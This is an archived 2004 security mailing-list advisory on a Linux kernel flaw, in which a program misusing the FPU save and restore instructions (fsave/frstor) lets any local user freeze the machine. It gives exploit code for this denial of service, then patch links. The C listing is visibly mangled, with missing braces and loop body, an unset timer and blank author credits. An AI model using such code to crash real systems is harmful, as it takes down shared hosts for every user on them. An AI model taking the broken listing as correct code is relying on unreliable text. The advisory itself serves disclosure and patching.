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[EXPL] Linux Kernel Crash Due To Floating Point Exception (frstor) Exploit Code

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Date: 21 Jun 2004 11:52:42 +0200
From: SecuriTeam <[email protected]>
To: [email protected]
Subject: [EXPL] Linux Kernel Crash Due To Floating Point Exception (frstor) Exploit Code

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  Linux Kernel Crash Due To Floating Point Exception (frstor) Exploit Code


The kernel is the most important part of the Linux operating system. It 
handles communication with the computers hardware and decides the priority 
of running programs (processes). If the kernels stops doing its job, 
everything else will too.

A bug in the Linux kernel lets a simple C program to crash the kernel, 
effectively locking the whole system. No root access is required, only 
local unprivileged access is needed.


Vulnerable Systems:
 * Linux kernel versions 2.4.2x through 2.6.x on x86 and amd64 systems

Immune Systems:
 * Linux kernel version 2.6.7 (latest)
 * Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel)
 * Linux Kernel 2.6.4 SMP patched with staircase scheduler
 * Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
 * Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
 * Linux Kernel 2.4.25-gentoo-r1
 * 2.2.19-kernel

Exploit Code:
The code that crashes the kernel is provided below:
--------------------------------- Begin Code 
/* --------------------
   * frstor Local Kernel exploit
   * Crashes any kernel from 2.4.18
   * to 2.6.7 because frstor in assembler 
   * inline offsets in memory by 4.
   * Original proof of concept code
   * by
   * Added some stuff by
   * and fixed the fsave line with (*fpubuf).
   * --------------------
  Some debugging information made
  available by
          pushl   %ebp
          movl    %esp, %ebp
          subl    $136, %esp
          leal    -120(%ebp), %eax
          movl    %eax, -124(%ebp)
          fsave -124(%ebp)
          subl    $4, %esp
          pushl   $1
          pushl   $.LC0
          pushl   $2
          call    write
          addl    $16, %esp
          leal    -120(%ebp), %eax
          movl    %eax, -128(%ebp)
          frstor -128(%ebp)
  #include <sys/time.h>
  #include <signal.h>
  #include <unistd.h>
  static void TakeDown(int ignore)
   char fpubuf[108];
  // __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
  __asm__ __volatile__ ("fsave %0\n" : : "m"(*fpubuf)); 
   write(2, "*", 1);
   __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
  int main(int argc, char *argv[])
   struct itimerval spec;
   signal(SIGALRM, TakeDown);
   setitimer(ITIMER_REAL, &spec, NULL);
    write(1, ".", 1);
   return 0;
  // <<EOF
---------------------------------- End Code 

Note: This bug is confirmed to be present when the code is compiled with 
GCC version 2.96, 3.0, 3.1, 3.2, 3.3 and 3.3.2 and used on Linux kernel 
versions 2.4.2x and 2.6.x on x86 and amd64 systems. This code does not 
compile (makes no executable) on sparc64 sun4u TI UltraSparc II 
(BlackBird). This doesn't affect NetBSD Stable as well.

SMP systems can be compromised although a seperate instance of the program 
is needed for each CPU before the system will halt. Each instance of the 
program code will lock one CPU and this process can not be killed. If you 
have two CPUs the second instance of the program kills the entire machine.

Since this exploit only requires a local shell with no privileges, any 
user who has a shell account, whether in an ISP web hosting or others, 
will be able to completely bring down the machine with minimum effort. 
Since the kernel immediately freezes, the attack will not be logged at 

Patch Availability:
The following links can be used in order to patch the kernel. The new 
Linux kernel is of course immune to this issue.

Patch for 2.4.2x Kernels, x86 and x86_64:
 * Patch for 2.4.2x, x86 -  
<> Bitkeeper i387.h patch x86
 * x86-64 is missing in Bitkeeper, Andr  Tomt posted patches including 
x86_64 at  <>;

Once the patch has been applied, the code can't halt the machine, although 
the process itself will consume 99% CPU usage. However, it can now be 
killed and the threat removed.

Patch for 2.6.xx Kernels, x86 and x86_64:
 * Patch for 2.6.x, x86 -  
<> Bitkeeper i387.h patch x86
 * Patch for 2.6.x, x86_64 -  
<>; Bitkeeper i387.h patch x86_64
 * Both -  
<>; 26_kernel_ia32-and-x86_64-fix-fpu-state.patch


The information has been provided by  <mailto:[email protected]> JM.

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